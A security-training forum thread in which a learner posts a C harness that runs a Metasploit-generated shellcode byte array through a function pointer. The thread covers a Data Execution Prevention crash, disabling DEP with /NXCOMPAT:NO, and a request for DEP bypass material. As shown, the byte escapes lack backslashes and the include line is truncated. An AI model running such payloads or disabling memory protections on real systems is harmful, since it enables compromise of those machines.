Testing shellcode in C/C++

Viewing 2 reply threads
  • Author
    Posts
    • #4668
      zeroflaw
      Participant

      Instead of using shellcode from generators etc, I decided to learn how to write shellcode myself. So the first step would be writing something that can test the shellcode before I attempt to use it in exploits.

      I googled around a bit and found a few C/C++ examples of how to do it. It makes use of a function pointer that points to the shellcode buffer. Well I keep getting an exception about some access violation. I don’t really like to ask questions, because maybe I should google around some more and find out on my own. I’m not sure if there’s something wrong with the shellcode because I don’t know how to write it yet.

      Heres my code, I compiled it with Microsoft Visual C++ 2008.


      #include

      // The x86 shellcode to run. Generated with Metasploit.
      char shellCode[] =
      "xbfx83xafxc1xb7xdbxcaxd9x74x24xf4x31xc9xb1x32"
      "x58x31x78x12x03x78x12x83x6bx53x23x42x97x44x2d"
      "xadx67x95x4ex27x82xa4x5cx53xc7x95x50x17x85x15"
      "x1ax75x3dxadx6ex52x32x06xc4x84x7dx97xe8x08xd1"
      "x5bx6axf5x2bx88x4cxc4xe4xddx8dx01x18x2dxdfxda"
      "x57x9cxf0x6fx25x1dxf0xbfx22x1dx8axbaxf4xeax20"
      "xc4x24x42x3ex8exdcxe8x18x2fxddx3dx7bx13x94x4a"
      "x48xe7x27x9bx80x08x16xe3x4fx37x97xeex8ex7fx1f"
      "x11xe5x8bx5cxacxfex4fx1fx6ax8ax4dx87xf9x2cxb6"
      "x36x2dxaax3dx34x9axb8x1ax58x1dx6cx11x64x96x93"
      "xf6xedxecxb7xd2xb6xb7xd6x43x12x19xe6x94xfaxc6"
      "x42xdexe8x13xf4xbdx66xe5x74xb8xcfxe5x86xc3x7f"
      "x8exb7x48x10xc9x47x9bx55x25x02x86xffxaexcbx52"
      "x42xb3xebx88x80xcax6fx39x78x29x6fx48x7dx75x37"
      "xa0x0fxe6xd2xc6xbcx07xf7xa4x23x94x9bx2a";

      int  main()
      {
      void (*shell)(); // Function pointer.
             shell = (void(*)()) (&shellCode);

      printf("Shellcode at: %pn", shellCode);
      printf("Function pointer points to: %pn", shell);

      // Run it!
             printf("Running shellcode...n");
      shell();

             return 0;
      }

      And I’m getting this from the assembly. I see it fails after the call to the shellcode.


                            // Run it!
                            shell();
                            008813FC 8B F4            mov         esi,esp
                            008813FE FF 55 F8         call        dword ptr [shell]
      breaks here --> 00881401 3B F4            cmp         esi,esp
                            00881403 E8 33 FD FF FF   call        @ILT+310(__RTC_CheckEsp) (88113Bh)

      I hope you guys can help me! Or at least point me in the right direction. Thanks in advance.

      ZF

    • #29065
      zeroflaw
      Participant

      Nevermind guys, I found the solution. Apparently the “Data Execution Prevention” or DEP kicked in, preventing code to run from the non-executable memory regions.

      Compiling with “/NXCOMPAT:NO” prevents this from happening. Now I can finally test my shellcode  😛

      Btw, does anyone know how to bypass this? Will DEP render all buffer overflow exploits useless?

      ZF

    • #29066
      Ketchup
      Participant

      I had a nice paper on bypassing DEP, but I can’t find it anywhere.  I did find this one:

      http://www.milw0rm.com/papers/161

Viewing 2 reply threads
  • You must be logged in to reply to this topic.

Copyright ©2021 Caendra, Inc.

Contact Us

Thoughts, suggestions, issues? Send us an email, and we'll get back to you.

Sending

Sign in with Caendra

Forgot password?Sign up

Forgot your details?